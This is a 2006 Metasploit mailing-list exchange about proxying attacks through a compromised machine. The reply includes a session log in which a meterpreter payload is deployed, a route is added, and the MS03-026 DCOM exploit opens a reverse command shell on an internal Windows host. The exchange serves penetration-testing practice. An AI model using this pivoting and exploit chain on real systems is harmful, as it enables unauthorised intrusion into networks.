[framework] staging attack proxy
Chris Byrd
cbyrd01 at gmail.com
Fri Nov 10 10:03:24 CST 2006
What you are looking for is the meterpreter payload. Once a system
has meterpreter on it, you should be able to route future exploits
through it using the route command. Here's a sample previously posted
by mmiller:
msf exploit(aggressive) > exploit -z
[*] Started reverse handler
[*] Sending 239 byte payload...
[*] Transmitting intermediate stager for over-sized stage...(89 bytes)
[*] Sending stage (2834 bytes)
[*] Sleeping before handling stage...
[*] Uploading DLL (73739 bytes)...
[*] Upload completed.
[*] Meterpreter session 1 opened (10.142.43.3:5555 -> 10.142.43.2:3008)
[*] Session 1 created in the background.
msf exploit(aggressive) > route add 192.168.37.0 255.255.255.0 1
msf exploit(aggressive) > use windows/dcerpc/ms03_026_dcom
msf exploit(ms03_026_dcom) > exploit
[*] Started reverse handler
[*] Trying target Windows NT SP3-6a/2000/XP/2003 Universal...
[*] Binding to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Bound to 4d9f4ab8-7d1c-11cf-861e-0020af6e7c57:0.0 at ncacn_ip_tcp:192.168.37.132[135]
...
[*] Sending exploit ...
[*] Sending stage (474 bytes)
[*] Command shell session 2 opened (10.142.43.3:5555 -> 10.142.43.2:3011)
[*] The DCERPC service did not reply to our request
Microsoft Windows 2000 [Version 5.00.2195]
(C) Copyright 1985-1999 Microsoft Corp.
C:\WINNT\system32>
I've had problems getting this to work myself, but I haven't tried it
with the more recent versions. If you try it out, please let me know
(or post on list) as to your results.
Thanks!
Chris
On 11/10/06, Valter Santos <vsantola at gmail.com> wrote:
> Folks,
>
> is there any support for staging attack proxies on metasploit (v2.7 or
> v3.0), searching the docs I don't see anything.
>
> What I want to mean with this is if it is possible to upload a
> "metasploit agent" to a compromised system and proxy attack through it
> (much in the terms of level1 agents on core impact). I think i read
> something about this for metasploit, but cannot find any info.
>
> cheers,
> /valter
>
> --
> o Valter Santos
> o Security Analyst
> o INFOCON Tactical Overview: http://infocon.sectoid.com
> o PGP: 0xE2A4B206
> o ..
> o Attack is the secret of defense; defense is the planning of an attack.
> o Sun Tzu, Art of War
>
More information about the framework
mailing list